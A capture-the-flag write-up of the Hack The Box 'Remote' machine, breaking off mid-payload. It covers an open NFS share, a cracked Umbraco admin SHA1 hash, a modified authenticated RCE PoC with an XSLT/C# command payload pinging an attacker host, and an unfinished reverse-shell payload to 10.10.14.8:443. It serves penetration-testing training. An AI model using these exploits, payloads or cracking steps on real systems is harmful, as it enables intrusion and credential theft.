Remote-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: directory scanning, mounting an NFS share, collecting Umbraco credential files, hash cracking, exploiting the Umbraco RCE vulnerability, modifying PoC code, reading TeamViewer 7 credentials, Rotten Potato privilege escalation

Reference links: partly follows the guided mode

0x01 Obtaining user privileges

1. Get the target machine's IP address: 10.10.10.180

2. Scan for open ports

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate 10000 10.10.10.180
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-16 10:13 CST
Nmap scan report for 10.10.10.180
Host is up (0.29s latency).
Not shown: 65519 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
111/tcp open rpcbind
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49678/tcp open unknown
49679/tcp open unknown
49680/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 13.15 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p21,80,111,135,139,445,2049,5985,47001 -sV -sC --min-rate=10000 10.10.10.180
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-16 10:15 CST
Nmap scan report for 10.10.10.180
Host is up (0.35s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open nlockmgr 1-4 (RPC #100021)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-03-16T03:16:27
|_ start_date: N/A
|_clock-skew: 59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 282.71 seconds

3. Take a look at the websites served on the open ports

4. Scan the directories on port 80

┌──(kali㉿offsec)-[~/Desktop]
└─$ dirsearch -u http://10.10.10.180/

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/http_10.10.10.180/__24-03-16_10-18-32.txt

Target: http://10.10.10.180/

[10:18:32] Starting:
[10:18:36] 403 - 312B - /%2e%2e//google.com
[10:18:37] 403 - 312B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[10:18:38] 404 - 2KB - /.ashx
[10:18:38] 404 - 2KB - /.asmx
[10:19:00] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[10:19:03] 200 - 2KB - /about-us
[10:19:08] 404 - 2KB - /admin%20/
[10:19:09] 404 - 2KB - /admin.
[10:19:31] 404 - 2KB - /asset..
[10:19:34] 400 - 11B - /base/
[10:19:34] 500 - 1KB - /base/static/c
[10:19:37] 200 - 2KB - /blog
[10:19:37] 200 - 2KB - /blog/
[10:19:38] 403 - 312B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[10:19:47] 200 - 3KB - /contact
[10:19:47] 200 - 3KB - /contact.aspx
[10:19:54] 400 - 3KB - /docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console
[10:20:10] 200 - 2KB - /home
[10:20:10] 200 - 2KB - /home.aspx
[10:20:14] 404 - 2KB - /index.php.
[10:20:14] 400 - 3KB - /index.php::$DATA
[10:20:15] 302 - 126B - /INSTALL -> /umbraco/
[10:20:15] 302 - 126B - /Install -> /umbraco/
[10:20:15] 302 - 126B - /install -> /umbraco/
[10:20:16] 302 - 126B - /install/ -> /umbraco/
[10:20:16] 200 - 1KB - /intranet
[10:20:18] 404 - 2KB - /javax.faces.resource.../WEB-INF/web.xml.jsf
[10:20:18] 404 - 2KB - /javax.faces.resource.../
[10:20:19] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[10:20:19] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[10:20:19] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[10:20:19] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[10:20:19] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[10:20:19] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[10:20:19] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[10:20:19] 400 - 3KB - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[10:20:19] 400 - 3KB - /jolokia/write/java.lang:type=Memory/Verbose/true
[10:20:19] 400 - 3KB - /jolokia/exec/java.lang:type=Memory/gc
[10:20:19] 400 - 3KB - /jolokia/search/*:j2eeType=J2EEServer,*
[10:20:19] 400 - 3KB - /jolokia/read/java.lang:type=*/HeapMemoryUsage
[10:20:26] 404 - 2KB - /login.wdm%20
[10:20:26] 404 - 2KB - /login.wdm%2e
[10:20:31] 500 - 3KB - /master/
[10:20:47] 200 - 2KB - /people
[10:20:57] 200 - 2KB - /products
[10:20:57] 500 - 3KB - /product
[10:20:57] 200 - 2KB - /products.aspx
[10:20:58] 500 - 3KB - /product.aspx
[10:21:00] 404 - 2KB - /rating_over.
[10:21:07] 404 - 2KB - /service.asmx
[10:21:15] 404 - 2KB - /static..
[10:21:24] 403 - 2KB - /Trace.axd
[10:21:24] 400 - 3KB - /Trace.axd::$DATA
[10:21:28] 200 - 6KB - /umbraco/webservices/codeEditorSave.asmx
[10:21:44] 404 - 2KB - /WEB-INF./web.xml
[10:21:44] 404 - 2KB - /WEB-INF./
[10:21:46] 400 - 3KB - /web.config::$DATA
[10:21:47] 404 - 2KB - /WebResource.axd?d=LER8t9aS

Task Completed

5. An Umbraco directory is found

http://10.10.10.180/umbraco/#/login/false?returnPath=%252Fforms

6. At this point there is basically no lead, but one piece of port information was actually missed earlier

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p2049 -sC -sV 10.10.10.180
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-16 20:53 CST
Nmap scan report for 10.10.10.180
Host is up (0.29s latency).

PORT STATE SERVICE VERSION
2049/tcp open nfs 2-4 (RPC #100003)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.80 seconds

7. Yes, it is the skill we just practised on the previous box: mounting the exported share

# https://book.hacktricks.xyz/v/cn/network-services-pentesting/nfs-service-pentesting#gua-zai

┌──(kali㉿offsec)-[~/Desktop]
└─$ showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo mkdir /mnt/new_back
[sudo] kali 的密码:


┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo mount -t nfs 10.10.10.180:/site_backups /mnt/new_back -o nolock

┌──(kali㉿offsec)-[~/Desktop]
└─$ ls -la /mnt/new_back
总计 123
drwx------ 2 nobody nogroup 4096 2020224日 .
drwxr-xr-x 3 root root 4096 31621:09 ..
drwx------ 2 nobody nogroup 64 2020221日 App_Browsers
drwx------ 2 nobody nogroup 4096 2020221日 App_Data
drwx------ 2 nobody nogroup 4096 2020221日 App_Plugins
drwx------ 2 nobody nogroup 64 2020221日 aspnet_client
drwx------ 2 nobody nogroup 49152 2020221日 bin
drwx------ 2 nobody nogroup 8192 2020221日 Config
drwx------ 2 nobody nogroup 64 2020221日 css
-rwx------ 1 nobody nogroup 152 2018112default.aspx
-rwx------ 1 nobody nogroup 89 2018112日 Global.asax
drwx------ 2 nobody nogroup 4096 2020221日 Media
drwx------ 2 nobody nogroup 64 2020221日 scripts
drwx------ 2 nobody nogroup 8192 2020221日 Umbraco
drwx------ 2 nobody nogroup 4096 2020221日 Umbraco_Client
drwx------ 2 nobody nogroup 4096 2020221日 Views
-rwx------ 1 nobody nogroup 28539 2020220日 Web.config

8. Some meaningless enumeration is omitted here. What we are looking at is the source directory of a website, and following that line of thought, what we need to find is the Umbraco credential file.

https://stackoverflow.com/questions/36979794/umbraco-database-connection-credentials

Your connection string clearly shows that you are using the default SQL Server CE database (Umbraco.sdf). You can find the Umbraco.sdf file in the /App_Data folder.

9. Following that hint, start going through the credential files

┌──(kali㉿offsec)-[/mnt/new_back]
└─$ cd App_Data

┌──(kali㉿offsec)-[/mnt/new_back/App_Data]
└─$ ls -la
总计 1977
drwx------ 2 nobody nogroup 4096 2020221日 .
drwx------ 2 nobody nogroup 4096 2020224日 ..
drwx------ 2 nobody nogroup 64 2020221日 cache
drwx------ 2 nobody nogroup 4096 2020221日 Logs
drwx------ 2 nobody nogroup 4096 2020221日 Models
drwx------ 2 nobody nogroup 64 2020221日 packages
drwx------ 2 nobody nogroup 4096 2020221日 TEMP
-rwx------ 1 nobody nogroup 36832 2020220日 umbraco.config
-rwx------ 1 nobody nogroup 1965978 2020220日 Umbraco.sdf

┌──(kali㉿offsec)-[/mnt/new_back/App_Data]
└─$ cp Umbraco.sdf ~/Desktop/

┌──(kali㉿offsec)-[/mnt/new_back/App_Data]
└─$ cp umbraco.config ~/Desktop/

10. Look up the administrator account information in the credential file

┌──(kali㉿offsec)-[~/Desktop]
└─$ strings Umbraco.sdf | grep admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/saveupdating SessionTimeout, SecurityStamp, CreateDate, UpdateDate, Id, HasIdentity
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/saveupdating Key, IsApproved, Groups, UpdateDate; groups assigned: writer
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/saveupdating Key, Groups, UpdateDate; groups assigned: writer
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "ssmith" <smith@htb.local>umbraco/user/saveupdating Name, Key, Groups, UpdateDate; groups assigned: writer
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "ssmith" <ssmith@htb.local>umbraco/user/saveupdating Username, Email, Key, Groups, UpdateDate; groups assigned: writer
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "ssmith" <ssmith@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "ssmith" <ssmith@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "ssmith" <ssmith@htb.local>umbraco/user/saveupdating Key, Groups, UpdateDate; groups assigned: writer
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" <admin@htb.local>192.168.195.1umbraco/user/sign-in/failedlogin failed
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
adminAdministratorsCADMOSKTPIURZ:5F7
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating TourData, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate

11. Start cracking the administrator hash

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo -n 'b8be16afba8c314ad33d812f22a04991b90e2aaa' > hash

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo john hash --format=Raw-SHA1 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 128/128 ASIMD 4x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
baconandcheese (?)
1g 0:00:00:00 DONE (2024-03-16 21:42) 1.136g/s 11163Kp/s 11163Kc/s 11163KC/s baconandchipies1..baconandcabbage
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed.

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 100 hash /usr/share/wordlists/rockyou.txt
b8be16afba8c314ad33d812f22a04991b90e2aaa:baconandcheese
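As an added example (not code from this writeup), the script below parses the `strings Umbraco.sdf` lines from steps 10 and 11 into user records, flags rows that store a bare unsalted digest, and checks one candidate password against a record using the algorithm named in the row. The sample input is constructed from the lines shown above; the e-mail extraction assumes the language tag (en-US) immediately follows the address in the dump.

```python
"""Extract password-hash records from `strings Umbraco.sdf` output and audit them."""
import hashlib
import re

# Constructed sample input: four lines in the shape `strings Umbraco.sdf` printed
# above (values copied from this page's own output), not read from a real file.
SAMPLE_STRINGS_OUTPUT = """\
Administratoradmindefaulten-US
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
"""

# SQL CE string columns come out back to back with no separator, so the only
# reliable anchor is a 40-hex-digit digest immediately followed by the JSON
# passwordConfig column ({"hashAlgorithm":"..."}).
RECORD_RE = re.compile(
    r'^(?P<before>.*?)(?P<hash>[0-9a-f]{40})'
    r'\{"hashAlgorithm":"(?P<alg>[A-Za-z0-9-]+)"\}(?P<after>.*)$'
)
# Assumption: the e-mail column is directly followed by the language column
# (a tag such as en-US); that tag is what terminates the address in the dump.
EMAIL_RE = re.compile(r"(?P<email>[\w.+-]+@[\w.-]+?)(?=[a-z]{2}-[A-Z]{2})")

# Bare, unsalted digests of the password: exactly what hashcat -m 100 above
# cracks directly, and the only schemes digest_candidate() handles.
UNSALTED_LEGACY = {"SHA1", "MD5"}


def parse_user_records(text):
    """Return one dict per line that carries a digest plus algorithm tag.
    Audit-log lines (no digest) are skipped."""
    records = []
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if not m:
            continue
        email_match = EMAIL_RE.search(m.group("after"))
        records.append({
            "fields_before_hash": m.group("before"),  # userName+userLogin, unseparated
            "email": email_match.group("email") if email_match else None,
            "hash": m.group("hash"),
            "algorithm": m.group("alg").upper(),
        })
    return records


def unique_hashes(records):
    """Deduplicate: several rows (a user and its copies) may share one digest."""
    return {r["hash"]: r["algorithm"] for r in records}


def is_unsalted_legacy(record):
    """True when the row stores a bare, unsalted digest of the password."""
    return record["algorithm"] in UNSALTED_LEGACY


def digest_candidate(password, algorithm):
    """Hex digest of `password` under the algorithm the row names.
    Umbraco's salted / HMAC membership formats are deliberately not covered."""
    if algorithm not in UNSALTED_LEGACY:
        raise ValueError(f"unsupported hashAlgorithm: {algorithm}")
    return hashlib.new(algorithm.lower(), password.encode("utf-8")).hexdigest()


def matches(record, password):
    """Check a single candidate password against one parsed record."""
    return digest_candidate(password, record["algorithm"]) == record["hash"]


def audit(text):
    """What a reviewer of a leaked backup wants: each unique digest, its
    algorithm, and whether it is an unsalted legacy scheme."""
    return [
        {"hash": h, "algorithm": alg, "unsalted": alg in UNSALTED_LEGACY}
        for h, alg in unique_hashes(parse_user_records(text)).items()
    ]


if __name__ == "__main__":
    for rec in parse_user_records(SAMPLE_STRINGS_OUTPUT):
        print(rec)
    print(audit(SAMPLE_STRINGS_OUTPUT))
```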

12. At this point we have the account credentials

admin@htb.local
baconandcheese

13. Log in to the site's back-end

http://10.10.10.180/umbraco/#/forms

14. Once in the back-end, we find the version information

admin

Umbraco version 7.12.4 assembly: 1.0.6879.21982

15. Search for related exploits

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit umbraco 7.12.4
----------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------- ---------------------------------
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) | aspx/webapps/49488.py
----------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results


┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit -m 46153
Exploit: Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution
URL: https://www.exploit-db.com/exploits/46153
Path: /usr/share/exploitdb/exploits/aspx/webapps/46153.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/46153.py

16. This PoC needs its parameters adjusted by hand

login = "admin@htb.local";
password="baconandcheese";
host = "http://10.10.10.180";

# The original PoC launched calc; changed here to ping the attacker host (10.10.14.8) to confirm command execution
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "/c ping 10.10.14.8"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = cmd;\
proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
</msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
</xsl:template> </xsl:stylesheet> ';

17. Use a ping command first to check whether command execution works

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 46153.py
Start
[]
End

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
22:05:28.264515 IP 10.10.10.180 > 10.10.14.8: ICMP echo request, id 1, seq 1, length 40
22:05:28.264652 IP 10.10.14.8 > 10.10.10.180: ICMP echo reply, id 1, seq 1, length 40
22:05:29.274109 IP 10.10.10.180 > 10.10.14.8: ICMP echo request, id 1, seq 2, length 40
22:05:29.274167 IP 10.10.14.8 > 10.10.10.180: ICMP echo reply, id 1, seq 2, length 40
22:05:30.269543 IP 10.10.10.180 > 10.10.14.8: ICMP echo request, id 1, seq 3, length 40
22:05:30.269602 IP 10.10.14.8 > 10.10.10.180: ICMP echo reply, id 1, seq 3, length 40
22:05:31.262638 IP 10.10.10.180 > 10.10.14.8: ICMP echo request, id 1, seq 4, length 40
22:05:31.262695 IP 10.10.14.8 > 10.10.10.180: ICMP echo reply, id 1, seq 4, length 40
^C
8 packets captured
8 packets received by filter
0 packets dropped by kernel

18. Modify the exploit code so that it launches a reverse shell directly

# Modified payload: run an encoded PowerShell reverse shell (back to 10.10.14.8:443) instead of calc
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
